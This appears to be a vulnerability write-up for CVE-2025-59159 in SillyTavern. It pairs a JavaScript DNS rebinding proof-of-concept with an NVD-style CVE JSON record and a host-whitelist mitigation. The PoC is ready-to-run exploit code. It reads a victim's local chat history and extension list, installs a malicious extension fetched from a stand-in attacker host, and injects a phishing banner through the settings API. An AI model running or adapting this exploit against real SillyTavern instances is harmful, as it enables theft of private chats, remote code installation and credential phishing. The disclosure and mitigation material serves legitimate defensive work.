CVE-2025-59159

// DNS Rebinding Attack PoC for SillyTavern CVE-2025-59159 // This PoC demonstrates how an attacker can exploit DNS rebinding // to interact with a local SillyTavern instance (default port 8000) // Step 1: Attacker controls a domain with a DNS server that initially // resolves to the attacker's server IP, then rebinds to 127.0.0.1 // Example: evil.example.com -> 1.2.3.4 (attacker IP) -> 127.0.0.1 // Step 2: Victim visits the attacker's page hosted on evil.example.com // <html> // <body> // <script> // Wait for DNS rebinding to take effect (TTL expiration) async function exploit() { // Wait for DNS to rebind to 127.0.0.1 await new Promise(r => setTimeout(r, 5000)); // Step 3: Send requests to local SillyTavern instance const target = 'http://evil.example.com:8000'; // Example: List installed extensions const extensions = await fetch(`${target}/api/extensions/installed`, { credentials: 'include' }); console.log('Extensions:', await extensions.text()); // Example: Read chat history const chats = await fetch(`${target}/api/chats`, { credentials: 'include' }); console.log('Chats:', await chats.text()); // Example: Install a malicious extension const installPayload = { url: 'http://attacker.com/malicious-extension.js' }; const installResult = await fetch(`${target}/api/extensions/install`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(installPayload), credentials: 'include' }); console.log('Install result:', await installResult.text()); // Example: Inject arbitrary HTML via settings update const injectPayload = { customCSS: '<div style="position:fixed;top:0;left:0;width:100%;background:red;color:white;padding:20px;text-align:center;z-index:9999">Phishing: Enter your credentials here</div>' }; const injectResult = await fetch(`${target}/api/settings/update`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(injectPayload), credentials: 'include' }); console.log('Inject result:', await injectResult.text()); } exploit(); // </script> // </body> // </html> // Mitigation: Enable host whitelist in config.yaml // hostWhitelist: // enabled: true // hosts: // - "localhost" // - "127.0.0.1" // Or set environment variable: SILLYTAVERN_HOSTWHITELIST_ENABLED=true

{"cve": {"id": "CVE-2025-59159", "sourceIdentifier": "[email protected]", "published": "2025-10-06T16:15:34.377", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. In versions prior to 1.13.4, the web user interface for SillyTavern is susceptible to DNS rebinding, allowing attackers to perform actions like install malicious extensions, read chats, inject arbitrary HTML for phishing attacks, etc. The vulnerability has been patched in the version 1.13.4 by introducing a server configuration setting that enables a validation of host names in inbound HTTP requests according to the provided list of allowed hosts: `hostWhitelist.enabled` in config.yaml file or `SILLYTAVERN_HOSTWHITELIST_ENABLED` environment variable. While the setting is disabled by default to honor a wide variety of existing user configurations and maintain backwards compatibility, existing and new users are encouraged to review their server configurations and apply necessary changes to their setup, especially if hosting over the local network while not using SSL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}, {"lang": "en", "value": "CWE-940"}]}], "references": [{"url": "https://docs.sillytavern.app/administration/#security-checklist", "source": "[email protected]"}, {"url": "https://docs.sillytavern.app/administration/config-yaml/#host-whitelisting", "source": "[email protected]"}, {"url": "https://github.com/SillyTavern/SillyTavern/commit/d134abd50e4a416e3b81233242583b0a23f38320", "source": "[email protected]"}, {"url": "https://github.com/SillyTavern/SillyTavern/releases/tag/1.13.4", "source": "[email protected]"}, {"url": "https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-7cxj-w27x-x78q", "source": "[email protected]"}]}}